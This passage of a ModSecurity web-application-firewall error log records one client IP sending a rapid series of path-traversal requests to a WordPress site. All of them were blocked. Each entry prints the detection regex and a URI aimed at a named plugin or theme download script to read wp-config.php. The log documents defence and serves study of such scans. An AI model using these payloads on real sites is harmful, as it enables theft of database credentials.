"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "Y8Dx_cx9A9c0KkSpLadQkwAAAJU"] [Fri Jan 13 00:54:05.473251 2023] [:error] [pid 31043:tid 140315130242816] [client 185.206.224.212:44008] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "Y8Dx_cx9A9c0KkSpLadQlAAAAJg"] [Fri Jan 13 00:54:05.602987 2023] [:error] [pid 31043:tid 140315230955264] [client 185.206.224.212:44010] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y8Dx_cx9A9c0KkSpLadQlQAAAIw"] [Fri Jan 13 00:54:06.538812 2023] [:error] [pid 31043:tid 140315147028224] [client 185.206.224.212:44014] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y8Dx_sx9A9c0KkSpLadQlgAAAJY"] [Fri Jan 13 00:54:06.666913 2023] [:error] [pid 31043:tid 140315289704192] [client 185.206.224.212:44018] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y8Dx_sx9A9c0KkSpLadQlwAAAIU"] [Fri Jan 13 00:54:06.786767 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:44020] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-includes/plugins/wp-mobile-detector/resize.php"] [unique_id "Y8Dx_qGMrWzzUVMdEhcM3gAAAMk"] [Fri Jan 13 00:54:06.902910 2023] [:error] [pid 31042:tid 140315172206336] [client 185.206.224.212:44022] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "Y8Dx_o6vAq65Ygpdg5ObfQAAAFM"] [Fri Jan 13 00:54:07.018428 2023] [:error] [pid 31043:tid 140315205777152] [client 185.206.224.212:44024] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y8Dx_8x9A9c0KkSpLadQmAAAAI8"] [Fri Jan 13 00:54:07.134554 2023] [:error] [pid 31041:tid 140315397105408] [client 185.206.224.212:44026] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y8Dx_8PRCDYHCWWhHpAj9gAAAAE"] [Fri Jan 13 00:54:07.249450 2023] [:error] [pid 31041:tid 140315272918784] [client 185.206.224.212:44028] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y8Dx_8PRCDYHCWWhHpAj9wAAAAc"] [Fri Jan 13 00:54:07.363965 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:44030] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y8Dx_6GMrWzzUVMdEhcM3wAAANQ"] [Fri Jan 13 00:54:07.495938 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:44032] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y8Dx_6GMrWzzUVMdEhcM4AAAAMc"] [Fri Jan 13 00:54:07.610482 2023] [:error] [pid 31042:tid 140315239347968] [client 185.206.224.212:44034] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "Y8Dx_46vAq65Ygpdg5ObfgAAAEs"] [Fri Jan 13 00:54:07.729938 2023] [:error] [pid 31043:tid 140315180599040] [client 185.206.224.212:44036] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y8Dx_8x9A9c0KkSpLadQmQAAAJI"] [Fri Jan 13 00:54:07.863898 2023] [:error] [pid 31041:tid 140315405498112] [client 185.206.224.212:44038] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "Y8Dx_8PRCDYHCWWhHpAj-AAAAAA"] [Fri Jan 13 00:54:07.978871 2023] [:error] [pid 31476:tid 140315289704192] [client 185.206.224.212:44040] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "Y8Dx_6GMrWzzUVMdEhcM4QAAAMU"] [Fri Jan 13 00:54:08.094691 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:44042] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y8DyAKGMrWzzUVMdEhcM4gAAAMM"] [Fri Jan 13 00:54:08.210251 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:44044] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "Y8DyAKGMrWzzUVMdEhcM4wAAAMw"] [Fri Jan 13 00:54:08.329887 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:44046] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2Fwp-config.php&filename=..%2F..%2Fwp-config.php&contenttype=text%2Fhtml&transient=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "Y8DyAKGMrWzzUVMdEhcM5AAAANU"] [Fri Jan 13 00:54:08.445544 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:44048] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y8DyAKGMrWzzUVMdEhcM5QAAAM8"] [Fri Jan 13 00:54:08.563437 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:44050] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "Y8DyAKGMrWzzUVMdEhcM5gAAANI"] [Fri Jan 13 00:54:11.848802 2023] [:error] [pid 31041:tid 140315388712704] [client 185.206.224.212:44066] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "Y8DyA8PRCDYHCWWhHpAj-wAAAAI"] [Fri Jan 13 00:54:11.964393 2023] [:error] [pid 31043:tid 